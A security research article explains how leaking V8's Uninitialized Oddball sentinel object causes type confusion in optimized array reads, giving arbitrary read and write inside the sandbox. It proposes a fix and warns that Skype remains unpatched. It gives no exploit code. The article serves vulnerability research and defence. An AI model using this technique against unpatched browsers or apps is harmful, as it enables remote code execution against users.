Bypassing Chrome v8 HardenProtect by leaking Sentinel Value

Introduction

A sentinel value is a special value in algorithms, typically used as a termination condition in loops or recursive algorithms. There are many sentinel values in the Chrome source code. Previous research introduced how to achieve arbitrary code execution within the sandbox by leaking the TheHole object. The Google team quickly updated the relevant fixes.

In addition to the TheHole object, there are many other native objects in V8 that should not leak into JS. This article will discuss the Uninitialized Oddball object, which is still applicable in the latest version of V8. It is worth noting that this method has a certain degree of generality and has appeared in multiple vulnerabilities.

Sentinel Value in V8

Most of the native objects in v8 are defined in the v8/src/roots/roots.h file, and these objects are arranged sequentially in memory. Once a native object that should not be leaked is leaked into Javascript, arbitrary code execution can be achieved within the sandbox.

To verify this method, we can leak the Uninitialized Oddball into JavaScript by modifying the native function of v8. Specifically, we can modify the offset relative to the isolate in the %TheHole() function.

Bypass HardenType

Using Uninitialized Oddball can achieve relatively arbitrary read and write. The key is that in the optimized JavaScript read function, it only checks whether the obj's prop attribute is correct, but does not check the value of the key obj.prop. Instead, it directly calculates the offset according to JavaScript semantics to obtain the value of the array. This causes type confusion during the computation, achieving arbitrary read.

Due to Uninitialized Oddball being sorted earlier and being more primitive in v8 memory, it is easier to spoof compared to TheHole object, making it the preferred method to bypass fixes after TheHole mitigation.

The suggested fix is to add a check for the array map when returning array elements from the optimized function, to avoid directly calculating the offset return value.

PatchGap Risk Reminder

In addition to paying attention to historical vulnerabilities, one must also be aware of the vulnerabilities that vendors quietly fix in their underlying components. Currently, Skype has not yet patched this vulnerability. The exploitation methods differ slightly between x86 and x64, but both can achieve arbitrary read and write.

This PatchGap not only involves Issue 1352549, but the disclosure of the new method has also significantly reduced the difficulty of exploiting similar vulnerabilities. Hackers can almost complete a full exploitation of the previously leaked Uninitialized Oddball vulnerability without any research.

Summary

There are many other Sentinel values in v8 that may have similar issues. This gives us some insights:

1. Are other Uninitialized Oddball leaks also easy to achieve v8 RCE?

2. Whether such issues should be officially regarded as security issues remains controversial.

3. During fuzz testing, it may be worth considering adding various Sentinel values as variables.

In any case, such issues will greatly shorten the complete exploitation cycle for hackers. We should remain vigilant about this.